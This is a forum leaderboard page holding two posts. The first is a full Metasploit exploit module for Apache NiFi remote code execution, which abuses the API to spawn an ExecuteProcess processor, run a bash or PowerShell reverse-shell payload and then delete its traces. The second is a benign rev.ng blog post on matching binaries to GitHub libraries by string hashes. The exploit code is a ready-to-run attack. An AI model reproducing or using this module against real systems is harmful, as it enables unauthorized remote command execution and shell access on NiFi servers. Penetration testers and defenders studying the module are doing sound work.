
Leaderboard

Popular Content

Showing content with the highest reputation on 12/01/20 in all areas

  1. Apache NiFi API Remote Code Execution (Metasploit module):

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Potential Improvements:
# Add option to authenticate using client certificate
# Add a scanner module?
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(
      info,
      'Name' => 'Apache NiFi API Remote Code Execution',
      'Description' => 'This module uses the NiFi API to create an ExecuteProcess processor that will execute OS commands. The API must be unsecured (or credentials provided) and the ExecuteProcess processor must be available. An ExecuteProcess processor is created, then configured with the payload and started. The processor is then stopped and deleted.',
      'License' => MSF_LICENSE,
      'Author' => ['Graeme Robinson'],
      'References' => [
        ['URL', 'https://nifi.apache.org/'],
        ['URL', 'https://github.com/apache/nifi'],
        ['URL', 'https://nifi.apache.org/docs/nifi-docs/components/org.apache.nifi/nifi-standard-nar/1.12.1/' \
                'org.apache.nifi.processors.standard.ExecuteProcess/index.html']
      ],
      'DisclosureDate' => 'Oct 3 2020',
      'DefaultOptions' => { 'RPORT' => 8080 },
      'Platform' => %w[unix linux macos win],
      'Arch' => [ARCH_X86, ARCH_X64],
      'Targets' => [
        [
          'Unix (In-Memory)',
          'Platform' => 'unix',
          'Arch' => ARCH_CMD,
          'Type' => :unix_memory,
          'Payload' => { 'BadChars' => '"' },
          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
        ],
        [
          'Windows (In-Memory)',
          'Platform' => 'win',
          'Arch' => ARCH_CMD,
          'Type' => :win_memory,
          'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/reverse_powershell' }
        ]
      ],
      'Privileged' => false,
      'DefaultTarget' => 0,
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'Reliability' => [REPEATABLE_SESSION],
        'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
      }
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path', '/nifi-api']),
        OptString.new('USERNAME', [false, 'Username to authenticate with']),
        OptString.new('PASSWORD', [false, 'Password to authenticate with']),
        OptString.new('BEARER-TOKEN', [false, 'JWT to authenticate with']),
        # 2 seconds seems enough in my lab, but set to 5 for safety
        OptInt.new('DELAY', [true, 'The delay (s) before stopping and deleting the processor', 5])
      ],
      self.class
    )
  end

  def check_response(description, response, expected_response_code, item = '')
    # Check that a response was received
    fail_with(Failure::Unreachable, "Unable to retrieve HTTP response from API when #{description}") unless response

    # Check that the response code was the expected one
    if response.code != expected_response_code
      fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code from API when #{description} " \
                                          "(received #{response.code}, expected #{expected_response_code})")
    end

    # Check that the requested item can be retrieved
    return if item.empty?

    body = response.get_json_document
    unless body.key?(item)
      fail_with(Failure::UnexpectedReply, "Unable to retrieve #{item} from HTTP response when #{description}")
    end
    body[item]
  end

  def supports_login
    response = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'access', 'config')
    })
    config = check_response('GETting access configuration', response, 200, 'config')
    config['supportsLogin']
  end

  def fetch_process_group
    opts = {
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'process-groups', 'root')
    }
    opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
    response = send_request_cgi(opts)
    check_response('GETting root process group', response, 200, 'id')
  end

  def create_processor(process_group)
    body = {
      'component' => {
        'type' => 'org.apache.nifi.processors.standard.ExecuteProcess'
      },
      'revision' => {
        'version' => 0
      }
    }
    opts = {
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'process-groups', process_group, 'processors'),
      'ctype' => 'application/json',
      'data' => body.to_json
    }
    opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
    response = send_request_cgi(opts)
    check_response("POSTing new processor in process group #{process_group}", response, 201, 'id')
  end

  def configure_processor(command)
    cmd = command.split(' ', 2)
    body = {
      'component' => {
        'config' => {
          'autoTerminatedRelationships' => ['success'],
          'properties' => {
            'Command' => cmd[0],
            'Command Arguments' => cmd[1]
          },
          'schedulingPeriod' => '3600 sec'
        },
        'id' => @processor,
        'state' => 'RUNNING'
      },
      'revision' => {
        'clientId' => 'x',
        'version' => 1
      }
    }
    opts = {
      'method' => 'PUT',
      'uri' => normalize_uri(target_uri.path, 'processors', @processor),
      'ctype' => 'application/json',
      'data' => body.to_json
    }
    opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
    response = send_request_cgi(opts)
    check_response("PUTting processor #{@processor} configuration", response, 200)
  end

  def stop_processor
    # Attempt to stop the processor
    body = {
      'revision' => {
        'clientId' => 'x',
        'version' => 1
      },
      'state' => 'STOPPED'
    }
    opts = {
      'method' => 'PUT',
      'uri' => normalize_uri(target_uri.path, 'processors', @processor, 'run-status'),
      'ctype' => 'application/json',
      'data' => body.to_json
    }
    opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
    response = send_request_cgi(opts)
    check_response("PUTting processor #{@processor} stop command", response, 200)

    # The stop may not have worked (but must be attempted first). Terminate threads now
    opts = {
      'method' => 'DELETE',
      'uri' => normalize_uri(target_uri.path, 'processors', @processor, 'threads')
    }
    opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
    response = send_request_cgi(opts)
    check_response("DELETEing processor #{@processor} terminate threads command", response, 200)
  end

  def delete_processor
    opts = {
      'method' => 'DELETE',
      'uri' => normalize_uri(target_uri.path, 'processors', @processor),
      'vars_get' => { 'version' => 3 }
    }
    opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
    response = send_request_cgi(opts)
    check_response("DELETEing processor #{@processor}", response, 200)
  end

  def check
    # As far as I can tell from the API documentation, it's not possible to check whether the required permissions
    # are present unless "permission to check permissions" is granted. For this reason it reports:
    # * "Unknown" if a timeout is experienced when checking whether login is required
    # * "Safe" if the response to the login check is not one of the two expected responses, because it's probably
    #   not NiFi
    # * "Detected" if login is required, because it has confirmed that NiFi is running on the port (it got an
    #   expected response)
    # * "Appears" if login is not required, because it has confirmed that NiFi is running (it got the expected
    #   response), and if there is no authentication then there is no way of restricting the ExecuteCode permission
    @cleanup_required = false
    response = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'access', 'config')
    })
    if !response
      CheckCode::Unknown
    else
      body = response.get_json_document
      if !body.key?('config')
        CheckCode::Safe
      elsif body['config']['supportsLogin']
        CheckCode::Detected
      else
        CheckCode::Appears
      end
    end
  end

  def validate_config
    return if datastore['BEARER-TOKEN'].to_s.empty? || datastore['USERNAME'].to_s.empty?

    fail_with(Failure::BadConfig, 'Specify EITHER Bearer-Token OR Username')
  end

  def retrieve_token
    response = send_request_cgi(
      {
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path, 'access', 'token'),
        'vars_post' => {
          'username' => datastore['USERNAME'],
          'password' => datastore['PASSWORD']
        }
      }
    )
    check_response('POSTing credentials', response, 201)
    response.body
  end

  def cleanup
    return unless @cleanup_required

    # Wait for the thread to execute. This seems necessary, especially on Windows,
    # and there is no way I can see of checking whether the thread has executed
    print_status("Waiting #{datastore['DELAY']} seconds before stopping and deleting")
    sleep(datastore['DELAY'])

    # Stop processor
    stop_processor
    vprint_good("Stopped and terminated processor #{@processor}")

    # Delete processor
    delete_processor
    vprint_good("Deleted processor #{@processor}")
  end

  def exploit
    validate_config

    # Check whether login is required and set/fetch the token
    if supports_login
      if datastore['BEARER-TOKEN'].to_s.empty? && datastore['USERNAME'].to_s.empty?
        fail_with(Failure::BadConfig, 'Authentication is required. Bearer-Token or Username and Password must be specified')
      end
      @token = if datastore['BEARER-TOKEN'].to_s.empty?
                 retrieve_token
               else
                 datastore['BEARER-TOKEN']
               end
    else
      @token = false
    end

    # Retrieve the root process group
    process_group = fetch_process_group
    vprint_good("Retrieved process group: #{process_group}")

    @cleanup_required = true

    # Create a processor in the root process group
    @processor = create_processor(process_group)
    vprint_good("Created processor #{@processor} in process group #{process_group}")

    # Generate the command
    case target['Type']
    when :unix_memory
      cmd = "bash -c \"#{payload.encoded}\""
    when :win_memory
      # This is a bit hacky because double quotes are processed and removed by the NiFi ExecuteProcess processor.
      # See below for why BadChars didn't cut it. The solution used is to wrap the command in a cmd /C "payload"
      # command and use PowerShell's stop-parsing token (--%) to remove the need to escape any metacharacters.
      # This command is then base64 encoded and run with -e/-EncodedCommand. This allows commands including double
      # quotes and dollar signs (etc.) to be passed to cmd.exe
      #
      # This method was chosen rather than using
      #   BadChars => '"'
      # with
      #   cmd /C "#{payload.encoded}"
      # because commands such as
      #   echo x^"x >%tmp%\x
      # did not work with the BadChars method ("^" is the cmd.exe escape char)
      enc_cmd = Base64.strict_encode64("cmd /C --% #{payload.encoded}".encode('UTF-16LE'))
      cmd = "powershell.exe -e #{enc_cmd}"
    end
    vprint_status("Using command #{cmd}")

    # Configure the processor and run the command
    configure_processor(cmd)
    vprint_good("Configured processor #{@processor} and ran command")
  end
end

# 0day.today [2020-12-01] #

Source
    1 point
  2. Today we are proud to show the world the first prototype of Big Match, our tool to find open-source libraries in binaries using only their strings. How does it work? Read this post to find out, or head to our demo website to try it out. Spoiler: we are analyzing all the repositories on GitHub and building a search engine on top of that data.

Introduction

There's a thing that every good reverser does when starting to work on a target: look for interesting strings and throw them into Google, hoping to find some open-source or leaked source code. This can save you anywhere from a few hours of work to several days. It's a kind of poor man's function (or library) matching.

In 2018, I decided to try out LINE's bug bounty program, so I started reversing a library bundled with the Android version of the app. For those unfamiliar with LINE, it's the most used instant messaging app in Japan. There were many useful error strings sprinkled all around my target, so I did exactly the manual googling I've just mentioned. Luckily, I was able to match some strings against Cisco's libsrtp. But little did I know, my target included a modified version of PJSIP, a huge library that does indeed include libsrtp. Unfortunately, I discovered this fact much later, so I wasted an entire week reversing an open-source library.

Outline of our approach

The way we, at rev.ng, decided to approach this problem is conceptually simple, but gets tricky due to the scale of the data we are dealing with. In short, this is the outline of what we did:

- Get the source code of the top C/C++ repositories on GitHub, where "top" means "most starred". Ideally we would like to analyze all of them, and we will eventually, but we wanted to give priority to famous projects.
- Deduplicate the repositories: we don't want 70k+ slightly different versions of the Linux kernel in our database.
- Extract the strings: use ripgrep as a quick way to extract strings from source code.
- De-escape the strings, e.g. turn '\n' into an actual newline character.
- Hash the strings.
- Store them in some kind of database.
- Query the database using the hashes of the strings from a target binary.
- Cluster the query results.

Where to start

The first thing we did was figure out a way to get the list of all the repos on GitHub, sorted by stars. It turns out, however, that this is more easily said than done. GitHub has an official API, but it is rate-limited, and we wanted to avoid writing a multi-machine crawling system just for that. So we looked around and, among the many projects making GitHub data available, we found the amazing GHTorrent.

GHTorrent, short for GitHub Torrent, is a project created by Prof. Georgios Gousios of TU Delft. It periodically polls GitHub's public events API and uses the information on commits and new repositories to record the history of GitHub. So, for example, if user thebabush pushes some changes to his repository awesome-repo, GHTorrent analyzes those changes and, if the repo is not present in its database, creates a new entry. It also saves the repo's metadata, e.g. star count, and some of its commits. By exploiting the GitHub REST API, GHTorrent is able to build a somewhat complete relational view of all of GitHub (except for the actual source code).

GHTorrent's data is made available either as a MySQL dump of that relational database or as a series of daily MongoDB dumps. GHTorrent uses Mongo as a caching layer for GitHub's API so that it can avoid making the same API call twice.

Once you import the GHTorrent MySQL dumps on your machine, you can quickly get useful information about GitHub using good ol' SQL (e.g. information about the most popular C/C++ repos is a simple SELECT ... WHERE ... ORDER BY ...; a sketch of such a query is shown below). It also contains information about forks and commits, so you have some good data to exploit for the repo deduplication we want to do.
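For readers who want to reproduce this step, here is a minimal sketch of such a query, assuming a local import of the GHTorrent MySQL dump and the mysql-connector-python package; the table and column names (projects, watchers, language, deleted) are assumptions about the GHTorrent schema, not something specified in this post.

# Hypothetical sketch: list the most-starred C/C++ repositories from a local
# GHTorrent MySQL import. Table/column names are assumptions; adjust them to
# the schema version you actually imported.
import mysql.connector

QUERY = """
SELECT p.url, p.language, COUNT(w.user_id) AS stars
FROM projects p
JOIN watchers w ON w.repo_id = p.id
WHERE p.language IN ('C', 'C++')
  AND p.deleted = 0
GROUP BY p.id, p.url, p.language
ORDER BY stars DESC
LIMIT 1000;
"""

def top_c_cpp_repos():
    conn = mysql.connector.connect(
        host="localhost", user="ghtorrent", password="ghtorrent", database="ghtorrent"
    )
    try:
        cur = conn.cursor()
        cur.execute(QUERY)
        return cur.fetchall()  # [(url, language, stars), ...]
    finally:
        conn.close()

if __name__ == "__main__":
    for url, language, stars in top_c_cpp_repos():
        print(stars, language, url)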
However, GHTorrent is best-effort by design, so you will never have a complete and consistent snapshot of GitHub. For example, some repos might be missing or have outdated metadata. Another example is that commit information is partial: GHTorrent cannot possibly associate every commit with every repository containing it. Think about the Linux kernel: one commit would need to be added to 70k+ forks, and that kind of thing doesn't scale very well.

Finally, there's another risk in relying on a project like GHTorrent: maintenance. Keeping a crawler working costs money and time, and it seems like in the last couple of years they haven't been releasing MySQL dumps that often anymore. On the other hand, they still release their incremental Mongo updates daily. Since they create the MySQL DB using REST API calls that are cached through MongoDB, those incremental updates should be everything you need to recreate their MySQL database. A fun fact is that Microsoft used to sponsor GHTorrent, but I guess they don't need to do that now. And yes, that's not a good thing for us.

In the end, since we don't actually need all the tables provided by the GHTorrent MySQL dump, we decided to write a script that directly consumes their Mongo dumps one by one and outputs the information we need into a bunch of text files. In fact, most of our pipeline is implemented using bash scripts (you can read more in our future blog post about what we like to call bashML).

Repository deduplication

We mentioned in the outline that we need to deduplicate the repositories. We need to do that for several reasons:

- As stated earlier, we don't want to download every single fork of every single famous project out there.
- Duplicated data means that our database of repos grows very fast in size. The first ~100k repos we downloaded from GitHub amount to ~1.4TB of gzip'd source code (without git history), so you can see why this is an important point.
- Duplicated data is bad for search result accuracy.

GHTorrent has information about forks but, as for GitHub itself, that only counts forks created with the "Fork" button on the web UI. The other option is to look for common commits between repositories. If we had infinite computing resources, we would do this:

- Clone every repository we care about.
- Put every commit hash in a graph database of some kind.
- Connect commit hashes using their parent/child relationship.
- Find the root commits.
- For every root commit, keep only the most-starred repo.

However, we live in the real world, so this is simply impossible for us to do. We would like a strategy to deduplicate repos before cloning them, as cloning would require a lot of time and bandwidth. On top of that, with git you can merge the history of totally unrelated projects, so if you deduplicate repos based on the root commit alone, you end up removing a lot of projects you actually want to keep. Case in point: octocat/Spoon-Knife.

octocat/Spoon-Knife is the most forked project on GitHub, and there's a reason for that: it's the repo used in GitHub's tutorial on forking. This means that a lot of people learning to use GitHub have forked this repo at some point.
You might be wondering why Spoon-Knife causes trouble for our theoretical deduplication algorithm. Well, take a look at LibreCAD's git history: at some point in the past, a user by the name of youarefunny was learning to use GitHub and forked Spoon-Knife. At some other point, he forked LibreCAD and made some commits. Then, for whatever reason, he thought "well, why not merge the history of these two nice repositories into a single one? That way we can have a branch with the history of both projects!". And finally, just to mess with us (that is, to contribute to a useful open-source project like LibreCAD), he decided to open a pull request using that exact branch. And that pull request was accepted.

TL;DR: the history of Spoon-Knife is included in LibreCAD's repo. If you want to check this out, clone LibreCAD/LibreCAD and run git diff f08a37f282dd30ce7cb759d6cf8981c982290170.

Things like this present a serious issue for us, because Spoon-Knife has 10.3k stars at the moment, while LibreCAD only has 2k. Which means that if we were to remove the least-starred project, we would actually remove LibreCAD and keep the utterly useless Spoon-Knife repo. I hate you, youarefunny. And no, you are not actually funny. But youarefunny is not alone in this: during our tests we've found that some people also like to merge the history of Linux and LLVM. Go figure.

Best-effort deduplication

So we can't git clone every repo on GitHub and we can't do root-based deduplication. What we can do is use GHTorrent once again and implement a different strategy. In fact, GHTorrent has information about commits too, albeit limited. This is what it gives us:

- (partial) (parent commit, child commit) relations;
- (partial) (commit, repository) relations.

Exploiting this data we can't reconstruct the full git history of every repository, but we can recreate subgraphs of it. We then apply this algorithm:

1. Find a commit for which GHTorrent doesn't have a parent (we call these parentless commits) and consider it a root commit.
2. Explore the commit history graph starting at a root commit. We do this going upward, that is, only following parent → child edges.
3. Group all the repositories associated with the commits of the subgraph we obtain in step 2. We call such a group a repository group.
4. For every repository group, find the most-starred repo it contains and consider it the parent repo, while the others are the children repos. We now have several (parent repo, child repo) relations.
5. Do all the previous steps for all the commit data in GHTorrent and obtain a huge graph of repositories related by has_parent relations.
6. Take all the repositories without parents and consider them unique repos. In other words, we will not crawl repos for which we have a parent.

This is easier shown than explained, so let's start with an example git history graph: we have 5 commits (A, B, C, D and E), related by is_parent relations, and for each commit we have data on which repos contain it. We have 2 root commits, A and E, and for each of them we perform steps 2 and 3 to create their repository groups, obtaining Group 1 and Group 2. We then take every group, together with the star counts of its repos, and create a partial repository graph. For example, if we take Group 2, repo4 is the repo with the most stars in it, so we assume that the other repos in the group are forked from it.

By joining all the partial repository graphs we extract from all the groups we've found, we get the full repository graph. We can now take the repositories without a parent and consider them deduplicated repos; in other words, those are the only ones we will crawl. This is pretty much how we try to deduplicate repositories prior to cloning them. Now, before you write us angry comments: we know this is not perfect, but it works and is a good trade-off between deduplicating too much and not deduplicating at all.
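To make the grouping step concrete, here is a minimal Python sketch of the idea (not rev.ng's actual pipeline code): given the partial (parent commit, child commit) and (commit, repository) relations plus star counts, it builds the repository groups and keeps, for each group, only the most-starred repo as the parent.

# Minimal sketch of the best-effort deduplication described above.
# Inputs are the partial relations available from GHTorrent:
#   parent_of:  child commit -> set of parent commits
#   repos_of:   commit       -> set of repos containing it
#   stars:      repo         -> star count
from collections import defaultdict

def deduplicate(parent_of, repos_of, stars):
    # Invert the (child -> parents) relation so we can walk parent -> child edges.
    children_of = defaultdict(set)
    for child, parents in parent_of.items():
        for parent in parents:
            children_of[parent].add(child)

    all_commits = set(repos_of) | set(parent_of) | set(children_of)
    # Commits for which GHTorrent gives us no parent are treated as root commits.
    roots = [c for c in all_commits if not parent_of.get(c)]

    has_parent = set()  # repos that end up as children of a more-starred repo
    for root in roots:
        # Step 2: explore the history subgraph upward, parent -> child edges only.
        group, stack, seen = set(), [root], set()
        while stack:
            commit = stack.pop()
            if commit in seen:
                continue
            seen.add(commit)
            group |= repos_of.get(commit, set())    # step 3: collect the repository group
            stack.extend(children_of.get(commit, ()))
        if len(group) < 2:
            continue
        # Step 4: the most-starred repo of the group is the parent, the others are children.
        parent_repo = max(group, key=lambda r: stars.get(r, 0))
        has_parent |= group - {parent_repo}

    # Steps 5-6: unique repos are those that never appear as somebody's child.
    return set(stars) - has_parent

if __name__ == "__main__":
    parent_of = {"B": {"A"}, "C": {"B"}, "D": {"B"}}                        # toy commit history
    repos_of = {"A": {"repo1"}, "C": {"repo1", "repo2"}, "D": {"repo3"}, "E": {"repo4"}}
    stars = {"repo1": 500, "repo2": 3, "repo3": 10, "repo4": 50}
    print(deduplicate(parent_of, repos_of, stars))                          # {'repo1', 'repo4'}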
From source code to string hashes

After crawling the repos resulting from the previous step, we need to analyze their C/C++ files to extract the strings inside them. Parsing C/C++ files is non-trivial due to macros, include files, and all those C magic goodies. In this first iteration of Big Match we wanted to be fast and favoured a simple approach: using grep (actually, ripgrep). So yeah, we just grep for single-line string literals and store them in a txt file. Then, we take every string from the file and de-escape it, so special characters like '\n' are converted to the real ASCII character they represent. We do this because, once strings pass through the compiler and end up in the final binary, they are not escaped anymore, so we try to emulate that process. Finally, we hash the strings and store the hex-coded hashes, again, in a txt file. This is nice because we end up with 3 files per repo:

- A tarball with its source code.
- A txt file with its strings.
- A txt file with its hashes (<repo_name>.hashes.txt).

If you are wondering why we like txt files so much, be sure to read the next section.
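Before moving on, here is a minimal sketch of this per-repo processing step. The exact string-literal regex and the hash function are not specified in the post, so the rough single-line C literal regex and the SHA-1 used here are assumptions.

# Minimal sketch of "string literals -> de-escaped strings -> hex-coded hashes".
import codecs
import hashlib
import re

# Very rough approximation of a single-line C/C++ string literal.
STRING_LITERAL = re.compile(r'"((?:[^"\\\n]|\\.)*)"')

def extract_strings(source: str):
    return [m.group(1) for m in STRING_LITERAL.finditer(source)]

def de_escape(s: str) -> str:
    # Turn escape sequences such as \n or \x41 into the characters the compiler
    # would emit; 'unicode_escape' is close enough for a sketch.
    return codecs.decode(s, "unicode_escape")

def hash_string(s: str) -> str:
    # The post only says strings are hashed and stored hex-coded; SHA-1 is an assumption.
    return hashlib.sha1(s.encode("utf-8", errors="replace")).hexdigest()

if __name__ == "__main__":
    src = 'printf("hello\\nworld"); puts("error: %s");'
    for lit in extract_strings(src):
        print(hash_string(de_escape(lit)), repr(de_escape(lit)))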
Polishing the data

As said above, our repository analysis pipeline leaves us with many <repo_name>.hashes.txt files containing all the hex-coded hashes of the strings in a repository. It's now time to turn those files into something we can use to build a search engine.

Search engine 101

A lot of modern search engines include some kind of vector space model. This is a fancy way of saying that they represent a document as a vector of words. For example:

txt_0 = "hello world my name is babush"
txt_1 = "good morning babush"

# once encoded, they become:
doc_0 = [
    1,  # hello
    1,  # world
    1,  # my
    1,  # name
    1,  # is
    1,  # babush
    0,  # good
    0,  # morning
]
doc_1 = [
    0,  # hello
    0,  # world
    0,  # my
    0,  # name
    0,  # is
    1,  # babush
    1,  # good
    1,  # morning
]

There are many flavours of vector space models, but the main point is that instead of just using a boolean value for the words, one can use word counts or some weighting scheme like tf-idf (more on this later).

What does the vector space model have to do with Big Match? Just swap repositories for documents and string hashes for words and you've got a model for building a repository search engine. And, instead of querying with a sequence of words, you just use a vector of string hashes as if they were a new repository. In our case, we decided not to count the number of times a string is present in a repository, so we just put a 1 if a string is present in a repo and then apply some weighting formula to tell the model that some strings are more important than others.

Now, how do you turn a bunch of txt files into a set of vectors? Enter bashML. You will read about it in another article on our blog, but the main point is that we can do everything using just bash scripts piping coreutils programs together. A picture is worth a million words, so enjoy this visualization of a part of our bash pipeline (created with our internal tool pipedream).

Algorithms and parameter estimation

The next step was to evaluate the best algorithms for weighting the strings in our repos/vectors. For this, we created an artificial dataset using strings from libraries we compiled ourselves (thanks, Gentoo). Without going into the details, it turns out that tf-idf weighting and simple cosine similarity work very well for our problem. For those of you unfamiliar with these terms:

- Tf-idf is a very common weighting scheme that considers both the popularity of the words in a document (in our case, string hashes in a repo) and the size of the documents (in our case, repositories). In tf-idf, popular words are penalized because it is assumed that common words convey less information than rare ones. Similarly, short documents are considered more informative than long ones, as the latter tend to match more often just because they contain more words.
- Cosine similarity, also very common, is one of the many metrics one can use to compare vectors. Specifically, it measures the angle between a pair of N-dimensional vectors: a similarity close to 1 means a small angle, while a value close to 0 means the vectors are orthogonal.

Long story short: scoring boils down to calculating the cosine similarity between a given repo and the set of hashes in input (both weighted using tf-idf); a minimal sketch of this scoring scheme is included at the end of this section.

We also wanted to study whether removing the top-K most common strings could improve the results of a query. Our intuition was that very frequent strings like "error" aren't very useful for disambiguating repositories. In fact, removing the most common strings did improve our results: cutting around K = 10k seemed to give the best score. Plotting the string frequencies (with both axes on a logarithmic scale) increased our confidence in that magic number: the first ~10k most frequent strings are very popular, then there is a somewhat flat area, and finally an area of infrequent strings. The plot, together with our tests, confirms that keeping strings that are too popular actually makes the query results worse.

At this point, due to the big number of near-duplicates still present in our database, the repo similarity scores looked like this:

$ strings /path/to/target | ./query.sh
0.95 repoA
0.94 repoA-fork1
0.92 repoA-fork2
0.91 repoA-fork3
...
0.60 repoB
0.59 repoB-fork1
0.57 repoB-fork3
0.52 library-with-repoB-sourcecode-inside
...

This is a huge problem, because it means that if we just show the top-K repositories with the highest similarity to our query, they are mostly different versions of the same repo. If there are two repos inside our binary, for example zlib and libssl, one of the two would be buried deep down in the results due to the many zlib or libssl versions out there. On top of that, developers often just copy zlib or libssl source code into their repos to have all dependencies ready on clone. For these reasons we wanted to cluster the search results. We once again used our artificial Gentoo dataset, plus some manual result evaluation, and ended up choosing spectral co-clustering as our clustering algorithm.
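Here is a minimal sketch of that scoring scheme (an illustration, not Big Match's actual code): binary repo vectors, an idf-style weighting (tf is binary because string counts are not used), L2 normalization, and cosine similarities computed with a single sparse matrix multiplication. The exact tf-idf variant used here is an assumption.

import numpy as np
from scipy import sparse

def build_matrix(repo_hashes, vocab):
    # rows = repos, columns = string hashes; an entry is 1 iff the repo contains the hash
    rows, cols = [], []
    for i, hashes in enumerate(repo_hashes):
        for h in hashes:
            if h in vocab:
                rows.append(i)
                cols.append(vocab[h])
    data = np.ones(len(rows))
    return sparse.csr_matrix((data, (rows, cols)), shape=(len(repo_hashes), len(vocab)))

def idf_weights(m):
    # Entries are binary, so a column sum is the number of repos containing that hash.
    df = np.asarray(m.sum(axis=0)).ravel()
    return np.log((1 + m.shape[0]) / (1 + df)) + 1.0  # smoothed idf (assumed variant)

def l2_normalize(m):
    norms = np.sqrt(np.asarray(m.multiply(m).sum(axis=1)).ravel())
    norms[norms == 0] = 1.0
    return sparse.diags(1.0 / norms) @ m

def score(repo_hashes, query_hashes):
    vocab = {h: j for j, h in enumerate(sorted(set().union(*repo_hashes)))}
    m = build_matrix(repo_hashes, vocab)
    w = sparse.diags(idf_weights(m))
    repos = l2_normalize(m @ w)                             # weighted, normalized repo matrix
    query = l2_normalize(build_matrix([query_hashes], vocab) @ w)
    return np.asarray((repos @ query.T).todense()).ravel()  # one cosine similarity per repo

if __name__ == "__main__":
    repos = [{"a", "b", "c"}, {"a", "d"}, {"e", "f"}]
    print(score(repos, {"a", "b", "x"}))                    # repo 0 gets the highest score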
We also plotted the clustered results and they looked pretty nice: on the x-axis you have the strings that match our example query, while on the y-axis you have the repositories matching at least one string hash. A red pixel means that repo y contains string x, and the blue lines just mark the different repository clusters. Due to the nature of spectral co-clustering, the more the plot looks like a block diagonal matrix, the better the clustering results are. It's interesting to note that strings plus clustering are good enough to visually identify similar repositories. One might also be able to use strings to guess whether a repository is wholly contained in a bigger one (once again, think of something like zlib inside the repo of an image compression program).

Putting it into production

Turning everything we have shown into a working search engine is just a matter of loading all the repo vectors into a huge (sparse) matrix and waiting for a query vector from the user. By query vector we mean that, once the user gives us a set of strings to search in Big Match, we encode them in a vector using the encoding scheme we've shown earlier. Since we use tf-idf and normalize properly, a matrix multiplication is all we need to score every repository against the query: scores = R · q, where R is the tf-idf-weighted, normalized repository matrix and q is the (equally weighted and normalized) query vector. After that we just need to use the scores to find the best-matching repositories, cluster them using their rows in the big matrix, and show everything to the user. But don't take our word for it, try our amazing web demo.

A second deduplication step

When we tried out our pipeline for the first time, the average amount of RAM required to store a repo vector was around 40kB. That's not too much, but we plan to have most of GitHub's C/C++ repos in memory, so we wanted to decrease it even more. Since we use a sparse matrix, memory consumption is proportional to the number of elements we store, and an element is stored iff it is non-zero.

To get a better insight into our initial dataset, we plotted the string counts of the top-10k repos with the most strings. The average string count is 23k, and if you mark the position of the repository that actually has ~23k strings (basically the repo with the average string count), summing everything on its left gives (almost) the same number as summing everything on its right: the area under the curve is divided evenly at that point. Keeping in mind that the dataset was made of ~60k repositories at this point, this means that the top-5k biggest repos occupied as much RAM as the remaining ~55k repos. So, if we can better deduplicate the most expensive (memory-wise) repositories, we should be able to lower the average amount of memory per repository by quite a bit. In case you are wondering what those projects are, they are mostly Android or plain Linux kernels that are dumped on GitHub as a single commit, so they bypass our first deduplication pass.

Since at this point we have the source code of every repository that passed through the first deduplication phase, we can apply a second, more expensive, content-aware deduplication to try to improve the situation. For this, we wrote a bash script that computes the Jaccard similarity of the biggest repositories in our dataset and, given two very similar projects, only keeps the most-starred one. With this method we were able to successfully deduplicate a lot of big repositories and decrease RAM usage significantly.
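For reference, a minimal sketch of such a content-aware pass: Jaccard similarity is the intersection-over-union of two repos' string-hash sets, and for each pair above a threshold only the most-starred repo is kept. The 0.8 threshold is an assumption; the post does not state the value used.

# Minimal sketch of the content-aware second deduplication pass: compare the
# string-hash sets of the biggest repos pairwise with Jaccard similarity and,
# for each very similar pair, keep only the most-starred repo.
from itertools import combinations

def jaccard(a: set, b: set) -> float:
    if not a and not b:
        return 1.0
    return len(a & b) / len(a | b)

def second_dedup(hashes_by_repo, stars, threshold=0.8):  # threshold is an assumption
    dropped = set()
    for r1, r2 in combinations(hashes_by_repo, 2):
        if r1 in dropped or r2 in dropped:
            continue
        if jaccard(hashes_by_repo[r1], hashes_by_repo[r2]) >= threshold:
            # Keep the most-starred repo of the pair, drop the other.
            dropped.add(min((r1, r2), key=lambda r: stars.get(r, 0)))
    return [r for r in hashes_by_repo if r not in dropped]

if __name__ == "__main__":
    hashes = {
        "linux-dump-1": {"h1", "h2", "h3", "h4"},
        "linux-dump-2": {"h1", "h2", "h3", "h4", "h5"},
        "small-lib": {"h9"},
    }
    stars = {"linux-dump-1": 12, "linux-dump-2": 3, "small-lib": 40}
    print(second_dedup(hashes, stars))   # ['linux-dump-1', 'small-lib']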
Pros and cons

Time to talk about the good and the bad of this first iteration of Big Match.

Pros:
- Perfect string matching works surprisingly well.
- Privacy: if a hash doesn't match, we don't know what string it represents.

Cons:
- We get relevant results only for binaries with a decent amount of strings.
- At the moment we only do perfect matching; in the future we want to support partial matches.
- Query speed is good enough, but we need to make it faster as we scale up our database.
- Using strings is sub-optimal: a proper decompiler-driven string extraction algorithm would be able to exploit, for example, pointers in the binary to better understand where strings actually start (strings is limited to very simple heuristics). So, instead of picking up strings with wrong prefixes like "XRWFHello World", we would be able to extract the actual string "Hello World".

Conclusion

